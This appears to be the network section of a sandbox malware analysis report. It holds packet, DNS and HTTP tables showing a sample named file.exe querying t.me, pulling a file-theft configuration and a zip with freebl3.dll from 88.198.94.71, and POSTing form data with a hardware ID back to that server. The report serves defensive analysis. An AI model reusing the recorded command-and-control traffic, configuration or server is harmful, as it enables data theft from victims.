Nov 30, 2022 00:10:05.256632090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256652117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256664991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256678104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256680965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256691933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256710052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256716013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256748915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.257787943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257811069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257824898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257843018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257848978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.257855892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257874012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257888079 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257905006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257909060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.257929087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257946968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257951021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.257960081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257977009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.257982969 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258006096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258008957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258033991 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258094072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258109093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258147001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258148909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258157969 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258162975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258177042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258194923 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258203030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258208036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258222103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258223057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258235931 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258249044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258265018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258268118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258281946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258291006 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258300066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258332014 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258335114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258349895 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258359909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258363008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258375883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258388042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258390903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258399963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258404970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258419037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258430004 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258430958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258444071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258461952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258466005 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258475065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258491993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258497953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258506060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258523941 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258533001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258555889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258569956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258632898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258652925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258666992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258683920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258688927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258697987 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258716106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258721113 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258728981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258753061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258807898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.258953094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258977890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258991003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.258999109 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259008884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259022951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259041071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259044886 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259054899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259077072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259254932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259285927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259322882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259335995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259341002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259349108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259366989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259371042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259380102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259396076 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259401083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259428024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259527922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259663105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259676933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259695053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259707928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259725094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259728909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259738922 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259757042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259763956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259768963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.259793043 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.259812117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.263614893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.264441013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.762116909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.762283087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.800749063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.800923109 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.802166939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.802326918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.841028929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.841602087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.841804028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.842292070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.843688965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.843805075 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.843837976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.843897104 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.843925953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.844149113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.847016096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.882400990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.882576942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.882623911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.882651091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.882724047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.882775068 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:07.885051012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.885087013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.885117054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.887132883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.887937069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.887972116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.888012886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.923329115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.923357964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.923690081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:07.923702955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:08.244543076 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:08.244694948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:15.047434092 CET	49708	80	192.168.2.7	88.198.94.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:10:03.656122923 CET	56588	53	192.168.2.7	8.8.8.8
Nov 30, 2022 00:10:03.672709942 CET	53	56588	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2022 00:10:03.656122923 CET	192.168.2.7	8.8.8.8	0x2a4	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2022 00:10:03.672709942 CET	8.8.8.8	192.168.2.7	0x2a4	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

88.198.94.71

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49707	149.154.167.99	443	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49708	88.198.94.71	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:10:04.549756050 CET	17	OUT	GET /1148 HTTP/1.1 Host: 88.198.94.71
Nov 30, 2022 00:10:04.694690943 CET	18	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 39 0d 0a 31 2c 31 2c 31 2c 31 2c 30 2c 63 38 34 38 32 61 33 61 33 33 33 33 31 38 38 65 64 65 65 30 35 33 62 39 62 61 32 62 33 38 63 36 2c 31 2c 31 2c 31 2c 31 2c 30 2c 44 65 66 61 75 6c 74 3b 25 44 4f 43 55 4d 45 4e 54 53 25 5c 3b 2a 2e 74 78 74 3b 35 30 3b 74 72 75 65 3b 6d 6f 76 69 65 73 3a 6d 75 73 69 63 3a 6d 70 33 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: 691,1,1,1,0,c8482a3a3333188edee053b9ba2b38c6,1,1,1,1,0,Default;%DOCUMENTS%\;*.txt;50;true;movies:music:mp3;0
Nov 30, 2022 00:10:04.722865105 CET	18	OUT	GET /233910279258.zip HTTP/1.1 Host: 88.198.94.71 Cache-Control: no-cache
Nov 30, 2022 00:10:04.762178898 CET	19	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:10:04 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf 7a e5 97 8c 8f 74 79 60 f1 f6 bb c5 c5 15 24 7f 72 7e f6 12 97 57 28 6b 88 b8 c6 12 d9 90 58 a1 45 72 e0 62 59 83 f0 06 da d1 81 a7 e0 4c b7 3d ee f9 0c 53 7e f6 4a f8 4d 87 df 1c f8 4d 83 df fb e0 d7 08 bf ab e0 d7 00 bf b9 f0 ab 87 df 2f c0 af 0e 7e ef 37 6d c9 7e 00 8e 4d c2 18 d4 e6 6a 82 0a 05 d7 98 20 56 2c 83 3a a0 e5 ba 71 6a 7a de 4e a3 07 5e 2e 86 9f 0d d9 79 8f 15 Data Ascii: PK$V%U+m\9\|Pufreebl3.dll\T7>aw(4!)UHhM:H15Nbu&Fv3-d uZnu]})JaP$f(l;@Rwy@R/D}4N3<o/['5'uJX;]Oyg-2w;d?Z?5bFVHjZ ,B#plVicHT~5VKF?E5%F~h:_?}^s,z\|M0w~io)2(ZLf=UFs6uhGyw44xcwLo2f=w=C'UE7zKO?7J}ssj?l;y/k\gul%\qyEWo#75il{dGLmFj9,26d<,kSoMe+2rqfg<!M9DI6&&Qz'\w(drb F#b>5<7@n(%b<:y(P5w MO!}Liz]=pdav\lm2O'LRg5g@#7]Ix_4>CM1#4ba<tp$;.8dw8N_TP}Lvc'bymu0z6I^#+iQ5(zty`$r~W(kXErbYL=S~JMM/~7m~Mj V,:qjzN^.y
Nov 30, 2022 00:10:04.762217045 CET	21	IN	Data Raw: 47 4a b3 f3 58 6b 68 f4 db d8 83 e9 ac 1e f8 55 f9 30 48 2e bc 01 0f c3 2b ba a9 8a cb 40 75 e5 97 e0 22 56 35 05 0f ac e5 c7 fa 29 af c3 8e e4 c0 ef 76 24 0f 7e 5f 40 72 f1 99 03 bc 29 e9 3a 01 5a 97 8e 8d 4a c3 56 67 a8 4c 8a 63 9a 61 06 53 89 Data Ascii: GJXkhU0H.+@u"V5)v$~_@r):ZJVgLcaSNE"^}m~0f~8WHcuME"K\|$vv2>L6&f`oSER~^/K:%/%&MC6zI?:b ='3pl%MQqL
Nov 30, 2022 00:10:04.762237072 CET	22	IN	Data Raw: 39 8d a5 f7 3d b6 b1 38 94 09 bd 30 f0 59 52 d1 81 fb 5e 47 bd 86 67 d6 87 f6 68 e2 54 17 9f 76 18 4a 00 6e 86 fe 4d a3 a8 68 10 f5 b2 a4 38 b4 45 13 27 43 ff 38 95 04 da ed 3a 9b 4d 32 c4 e5 87 03 ce fb 00 70 ca 8b 00 ec 66 cb 05 3a b9 c8 10 f9 Data Ascii: 9=80YR^GghTvJnMh8E'C8:M2pf:lqPiwGyGK$yMX!FYiP`l6r]b c\8[z>UU}XXl#=x~>;JkWHE4tG&n
Nov 30, 2022 00:10:04.762262106 CET	23	IN	Data Raw: 86 fe 8e 3f 47 2f 6d 0c 3d 4b 67 fa fe f3 c8 d2 33 d3 59 ca 4e 0e c2 f9 c6 50 1b 3d 63 f8 29 de 88 37 f7 79 d0 67 06 60 b1 7e 53 a8 86 3f 22 8c 2e 1d c9 19 79 21 54 42 17 bf 35 3a 8d c5 54 da 74 2e ff 17 f1 97 8d 72 5e fe ea 5d 04 6f e5 67 f5 2a Data Ascii: ?G/m=Kg3YNP=c)7yg`~S?".y!TB5:Tt.r^]og*/1>`Sjcuj,C!KZNxYV]X }a'bXa(Y9%\}2rfCh~7V3-IW4bS$:Xg3?Mtugi4MX?uy([))AF
Nov 30, 2022 00:10:04.762298107 CET	25	IN	Data Raw: 4f be 36 81 5d 81 87 d5 27 bb d1 b0 ac 58 8c 86 65 45 12 99 95 74 7a 05 8c 1b bc 05 c2 a0 d7 c2 8b b6 90 30 ec aa 07 b7 75 41 76 c0 f5 8c 5b 35 dd 50 09 be 9a 4b 36 29 f7 36 34 86 19 cb 35 57 c5 ba 2e 7a 64 c5 ad be 6b c6 e4 46 4e a2 10 70 79 75 Data Ascii: O6]'XeEtz0uAv[5PK6)645W.zdkFNpyuH!0GU'eGfR,W{Ps%##B=kda5sju,}bWdY M"<H[>mb%Tpbdy}D?f}8\|](+m,tP/txYCA
Nov 30, 2022 00:10:04.762319088 CET	26	IN	Data Raw: cc 93 8e 07 8e 13 42 ab 5c 94 cf 3c 2b 54 7d 94 cf 90 10 4e 31 c7 89 54 db 61 e9 22 b3 1f 64 17 65 6a 27 34 a2 92 57 38 a8 b5 1e 04 44 00 1e 25 05 b8 d3 0b 0a e2 38 2c 75 b2 71 b1 7a 48 8f 7a cf 86 95 8a 76 15 b1 93 2b f1 c0 79 02 2c d0 ae b5 ec Data Ascii: B\<+T}N1Ta"dej'4W8D%8,uqzHzv+y,dAb~$EQ$V5#`AsMn\|`]buU[;VO BQ@>~I";IP1(Y.t\<%Zk3g\|yt3d"v~-CblIi
Nov 30, 2022 00:10:04.762351036 CET	27	IN	Data Raw: 9b db d8 43 9b 39 c1 47 f7 72 67 48 7a 0b 5a 6b 09 22 de 0e 4a 6d 52 63 9c bd c2 22 fb 88 d8 be d4 33 08 60 05 e8 dc 00 41 24 10 e9 66 d6 2e 56 a3 8d aa 11 6b c0 62 51 d1 68 4d bb d0 9a da 82 29 20 71 41 29 30 dd 9a 32 9b 5b b6 9e 50 f9 ea e7 7c Data Ascii: C9GrgHzZk"JmRc"3`A$f.VkbQhM) qA)02[P\|r\|iNxVEFHSFrSOP~yL):)=,L("0rkz}JG4(Tj*4qa9H020!:l;'Q%pR&ShbTZcL
Nov 30, 2022 00:10:04.762372971 CET	29	IN	Data Raw: 85 bb 15 cc 18 74 f0 e2 50 53 a5 4e 85 5e db 71 22 96 aa 50 0b 46 1b 7c 5a 9a e4 06 fb 12 ef ff 83 9c e6 23 84 04 d6 46 14 24 40 81 a0 b5 96 60 eb e6 28 6c b5 bb a5 06 c5 0f b4 a2 81 0d d2 08 8f 17 f3 b3 5e 36 44 bd 0f 0a 1e e6 b0 75 94 87 58 04 Data Ascii: tPSN^q"PF\|Z#F$@`(l^6DuX\lTJ.:1AXjA9rYuyfV ^),AU;X+-0l#ijA@\)R<S"8ZuCe9kdyv2{JUd.vH<gWX4Vi\|.48MpPMF
Nov 30, 2022 00:10:04.762401104 CET	30	IN	Data Raw: 9b 78 da 8d b0 88 f3 2c 4a 3d 95 ea 43 e3 7a 1e f4 ae 9b 47 86 a8 87 3c 97 cd 21 ee 29 35 2d 14 e6 69 21 ad a5 6c 9a 71 ad 42 e3 5a 45 7a 15 b5 ac 4a c0 09 71 83 34 4a 63 2e 93 6c 88 14 2a c8 f3 58 dc b6 6e 50 6d eb b6 68 1e ab 11 4c 86 23 8c 7d Data Ascii: x,J=CzG<!)5-i!lqBZEzJq4Jc.lXnPmhL#}Us4MqH5NLAIAy' \8-s:[E\W^{}Jp7W]JN+1bC6eUEHHt,^[07+u~s*M)!{<+D
Nov 30, 2022 00:10:04.762422085 CET	31	IN	Data Raw: 0e a0 f1 55 93 1a d1 e1 cd 90 30 15 17 c3 cb d6 32 69 48 b6 1f 80 00 c6 cf c5 f8 bc 9e 75 6a 4f 92 f7 39 b4 4c 9d 1a c6 a5 98 26 6d 41 64 d8 2c 8d aa fe ed 08 f7 6f dc f5 87 84 09 c5 fa b6 f2 74 e1 45 94 df 4b 1c d9 60 34 73 80 22 f9 3c 55 c0 72 Data Ascii: U02iHujO9L&mAd,otEK`4s"<Urc'hV>MO&ygS#N!=4j0-m>[]:TNiCHg'sO,p[%lU5u<MHqxV_A6iCQYH{qWfD-^'E
Nov 30, 2022 00:10:04.800975084 CET	33	IN	Data Raw: c6 14 e5 d5 4a 53 f1 59 84 21 8c 78 47 a5 7a cc 20 e0 ec b5 a0 1e bb e9 bc 3e 06 2e f8 e0 89 a3 2f a5 95 4f 30 ec 44 11 1d a5 04 af 3a af 80 e3 59 c7 b1 68 28 ad cc 2b 60 ed c0 f9 ab 00 34 9a 69 c2 b1 b2 18 a4 8d 83 da 69 e9 2f 61 32 a5 3d 3e 99 Data Ascii: JSY!xGz >./O0D:Yh(+`4ii/a2=>`.MBw$g\U%xEcf@18suB,7jcY7zXZ0oD;AKFLS5%kMZU\YQXM+P@I0_!/[_j+u/5{S #u1
Nov 30, 2022 00:10:07.762116909 CET	2835	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4550768666964492 Host: 88.198.94.71 Content-Length: 110914 Connection: Keep-Alive Cache-Control: no-cache
Nov 30, 2022 00:10:07.762283087 CET	2847	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 35 35 30 37 36 38 36 36 36 39 36 34 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 72 6f 66 69 6c 65 22 0d 0a 0d 0a 31 31 34 38 0d 0a 2d 2d Data Ascii: ------4550768666964492Content-Disposition: form-data; name="profile"1148------4550768666964492Content-Disposition: form-data; name="profile_id"0------4550768666964492Content-Disposition: form-data; name="hwid"d87633a38bb0
